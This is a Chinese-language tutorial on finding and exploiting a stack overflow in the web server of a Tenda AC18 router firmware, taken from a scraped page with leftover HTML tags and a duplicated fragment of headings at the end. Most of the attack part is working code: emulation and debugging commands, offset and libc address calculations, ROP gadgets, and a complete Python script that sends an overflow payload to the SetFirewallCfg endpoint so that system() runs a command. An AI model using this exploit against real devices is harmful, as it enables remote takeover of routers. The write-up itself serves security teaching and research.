ARM架构下的栈溢出漏洞挖掘与利用技术详解<\/h1>

一、环境准备与固件模拟<\/h2>

1. 固件分析工具准备<\/h3>
firmwalker工具<\/strong>：用于扫描固件中的web相关信息<\/p>
.\/firmwalker.sh ..\/US_AC18V1.0BR_V15.03.05.05_multi_TD01.bin > log.log
<\/span><\/span><\/code><\/pre><\/li>

binwalk工具<\/strong>：用于解压固件<\/p>
binwalk -Me US_AC18V1.0BR_V15.03.05.05_multi_TD01.bin
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
2. 固件架构识别<\/h3>
使用file<\/code>命令识别固件架构：<\/p>
file busybox
<\/span><\/span><\/code><\/pre>确认是LSB ARM小端架构。<\/p>
3. QEMU用户级模拟<\/h3>
cp $(<\/span>which qemu-arm-static)<\/span> .\/qemu
<\/span><\/span>cp -rf .\/webroot_ro\/* .\/webroot\/
<\/span><\/span>sudo chroot .\/ .\/qemu .\/bin\/httpd
<\/span><\/span><\/code><\/pre>4. IDA Pro逆向分析<\/h3>
使用IDA打开httpd二进制文件，定位关键函数。<\/p>
二、漏洞定位与分析<\/h2>
1. 漏洞函数<\/h3>
漏洞位于formSetFirewallCfg<\/code>函数中：<\/p>
sub_16FE4("SetFirewallCfg"<\/span>, formSetFirewallCfg);
<\/span><\/span><\/code><\/pre>2. 漏洞点分析<\/h3>

传入firewallEn<\/code>参数，当值大于3时进行strcpy<\/code>操作<\/li>
由于缺乏边界检查，导致栈溢出漏洞<\/li>
<\/ul>
三、漏洞利用技术<\/h2>
1. 动态调试环境搭建<\/h3>
# 第一个终端<\/span>
<\/span><\/span>sudo chroot .\/ .\/qemu -g 1234<\/span> .\/bin\/httpd
<\/span><\/span>
<\/span><\/span># 第二个终端<\/span>
<\/span><\/span>gdb-multiarch
<\/span><\/span>set arch arm
<\/span><\/span>tar rem :1234
<\/span><\/span>c
<\/span><\/span><\/code><\/pre>2. 偏移量计算<\/h3>
使用cyclic模式计算溢出偏移：<\/p>
import<\/span> requests
<\/span><\/span>from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span>url =<\/span> "http:\/\/192.168.50.18\/goform\/SetFirewallCfg"<\/span>
<\/span><\/span>cookie =<\/span> {"Cookie"<\/span>:"password=1234111115"<\/span>}
<\/span><\/span>data =<\/span> {"firewallEn"<\/span>: cyclic(100<\/span>)}
<\/span><\/span>response =<\/span> requests.<\/span>post(url, cookies=<\/span>cookie, data=<\/span>data)
<\/span><\/span>response =<\/span> requests.<\/span>post(url, cookies=<\/span>cookie, data=<\/span>data)
<\/span><\/span>print(response.<\/span>text)
<\/span><\/span><\/code><\/pre>通过cyclic -l 0x6161616e<\/code>计算得出溢出偏移为52字节。<\/p>
3. 关键地址计算<\/h3>
libc基址计算<\/h4>

在gdb中下断点：
b puts
<\/span><\/span>continue<\/span>
<\/span><\/span><\/code><\/pre><\/li>
使用IDA查看libc.so.0文件中puts函数的偏移量为0x35CD4<\/li>
计算libc基址：
libc基址 = 运行时地址 - IDA偏移量 = 0x3fdd5cd4 - 0x35cd4 = 0x3FDA0000
<\/code><\/pre>
<\/li>
<\/ol>
system函数地址计算<\/h4>
system_base = libc_base + 0x5A270
<\/code><\/pre>
4. ROP链构造<\/h3>
Gadget查找<\/h4>


查找控制R3的gadget：<\/p>
ROPgadget --binary .\/lib\/libc.so.0 --only "pop"<\/span>| grep r3
<\/span><\/span><\/code><\/pre>结果为：0x00018298 : pop {r3, pc}<\/code><\/p>
<\/li>

查找控制R0的gadget：<\/p>
ROPgadget --binary .\/lib\/libc.so.0 | grep "mov r0, sp"<\/span>
<\/span><\/span><\/code><\/pre>结果为：0x00040cb8 : mov r0, sp ; blx r3<\/code><\/p>
<\/li>
<\/ol>
Payload构造<\/h4>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>import<\/span> requests
<\/span><\/span>
<\/span><\/span>cmd =<\/span> b<\/span>"echo PWN!"<\/span>
<\/span><\/span>libc_base =<\/span> 0x3FDA0000<\/span>
<\/span><\/span>system_addr =<\/span> libc_base +<\/span> 0x5A270<\/span>
<\/span><\/span>gadget1_addr =<\/span> libc_base +<\/span> 0x18298<\/span>
<\/span><\/span>gadget2_addr =<\/span> libc_base +<\/span> 0x40cb8<\/span>
<\/span><\/span>
<\/span><\/span>payload =<\/span> b<\/span>'a'<\/span>*<\/span>52<\/span>
<\/span><\/span>payload +=<\/span> p32(gadget1_addr)  # pop {r3, pc}<\/span>
<\/span><\/span>payload +=<\/span> p32(system_addr)   # 存入r3<\/span>
<\/span><\/span>payload +=<\/span> p32(gadget2_addr)  # 跳转到gadget2<\/span>
<\/span><\/span>payload +=<\/span> cmd                # 字符串参数（通过r0传递）<\/span>
<\/span><\/span>
<\/span><\/span>url =<\/span> "http:\/\/192.168.50.18\/goform\/SetFirewallCfg"<\/span>
<\/span><\/span>cookie =<\/span> {"Cookie"<\/span>:"password=asdasddsada"<\/span>}
<\/span><\/span>data =<\/span> {"firewallEn"<\/span>: payload}
<\/span><\/span>response =<\/span> requests.<\/span>post(url, cookies=<\/span>cookie, data=<\/span>data)
<\/span><\/span>response =<\/span> requests.<\/span>post(url, cookies=<\/span>cookie, data=<\/span>data)
<\/span><\/span>print(response.<\/span>text)
<\/span><\/span><\/code><\/pre>四、动态调试验证<\/h2>
1. 调试环境<\/h3>
# 第一个终端<\/span>
<\/span><\/span>sudo chroot .\/ .\/qemu -g 1234<\/span> .\/bin\/httpd
<\/span><\/span>
<\/span><\/span># 第二个终端<\/span>
<\/span><\/span>gdb-multiarch
<\/span><\/span>set arch arm 
<\/span><\/span>file .\/bin\/httpd
<\/span><\/span>tar rem :1234
<\/span><\/span>b *0xAC7FC
<\/span><\/span>c
<\/span><\/span><\/code><\/pre>2. 关键执行流程<\/h3>

运行至0xad03c (formSetFirewallCfg+3148)<\/code>处的返回地址<\/li>
成功跳转到gadget1<\/li>
将system地址存入r3寄存器<\/li>
运行到gadget2，控制R0寄存器<\/li>
调用R3寄存器的system函数执行命令<\/li>
<\/ol>
五、总结<\/h2>
本技术文档详细介绍了ARM架构下栈溢出漏洞的完整利用流程，包括：<\/p>

固件模拟环境的搭建<\/li>
漏洞定位与分析方法<\/li>
关键地址的计算技巧<\/li>
ROP链的构造方法<\/li>
动态调试验证技术<\/li>
<\/ol>
关键点在于：<\/p>

准确计算溢出偏移<\/li>
正确获取libc基址和关键函数地址<\/li>
精心构造ROP链控制程序执行流<\/li>
通过动态调试验证利用效果<\/li>
<\/ul>
ARM架构下的栈溢出漏洞挖掘与利用技术详解<\/h1>

一、环境准备与固件模拟<\/h2>

4. IDA Pro逆向分析<\/h3> 使用IDA打开httpd二进制文件，定位关键函数。<\/p>

二、漏洞定位与分析<\/h2>

三、漏洞利用技术<\/h2>

4. ROP链构造<\/h3>

四、动态调试验证<\/h2>

4. IDA Pro逆向分析<\/h3>
使用IDA打开httpd二进制文件，定位关键函数。<\/p>
